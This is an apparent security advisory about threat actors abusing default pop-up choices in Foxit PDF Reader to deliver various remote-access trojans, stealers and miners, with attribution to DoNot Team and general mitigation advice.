Foxit PDF Reader Flaw Exploited by Hackers to Deliver Diverse Malware Arsenal

Threat actors are leveraging a design flaw in Foxit PDF Reader to distribute a range of malware, including Agent Tesla, AsyncRAT, DCRat, NanoCore RAT, NjRAT, Pony, Remcos RAT, and XWorm. According to a technical report from Check Point, the exploit uses security warnings to deceive users into executing harmful commands. This vulnerability is unique to Foxit PDF Reader, as Adobe Acrobat Reader, more commonly used in sandboxes and antivirus solutions, is not affected, resulting in a low detection rate for the campaign. The flaw in Foxit PDF Reader involves a pop-up that presents "OK" as the default option when users are prompted to trust a document. If users click "OK," a second pop-up appears with "Open" as the default option, leading to the execution of commands that download and run malicious payloads from Discord's content delivery network . Security researchers noted that users are likely to click "Agreed" on the second message without reading it, due to common human behavior.

Check Point identified a malicious PDF document with a military theme. When opened in Foxit PDF Reader, it executed a command to download a downloader, which then retrieved two executables designed to collect and upload data such as documents, images, archive files, and databases to a C2 server. Further investigation revealed that the downloader could also deploy a third payload capable of capturing screenshots from the infected host and uploading them to the C2 server. This activity, linked to espionage, has been attributed to the DoNot Team (also known as APT-C-35 and Origami Elephant), based on similarities with previously observed tactics and techniques.

Security Officer Comments:
In another instance, threat actors used the same technique to deploy a stealer and two cryptocurrency miner modules, XMRig and lolMiner. Some of these malicious PDF files were distributed via Facebook. The Python-based stealer malware was capable of extracting victims' credentials and cookies from Chrome and Edge browsers. The miners were retrieved from a Gitlab repository created by a user named topworld20241, which was still active as of the report's writing. Additionally, another case documented by the cybersecurity company involved a PDF file that acted as a conduit to retrieve Blank-Grabber, an open-source information stealer from Discord's CDN, which has since been archived on GitHub as of August 6, 2023. In a separate instance, a malicious PDF included a hyperlink to an attachment on Trello, which upon downloading revealed a secondary PDF containing malicious code exploiting Foxit Reader users.

Suggested Corrections:
The continued abuse of legitimate platforms like Discord, Gitlab, and Trello by threat actors helps them evade detection by blending with normal network traffic. Foxit has acknowledged the issue and plans to release a fix in version 2024.3, with the current version being 2024.2.1.25153. Until the software update is applied, Foxit users are advised to remain vigilant about potential exploitation and adhere to classic defense practices. To mitigate the risks of being affected by such threats, it is essential to:

  • Keep operating systems and applications updated through timely patches and other means.
  • Be cautious of unexpected emails with links, especially from unknown senders.
  • Enhance cybersecurity awareness among employees.
  • Consult security specialists for any doubts or uncertainties.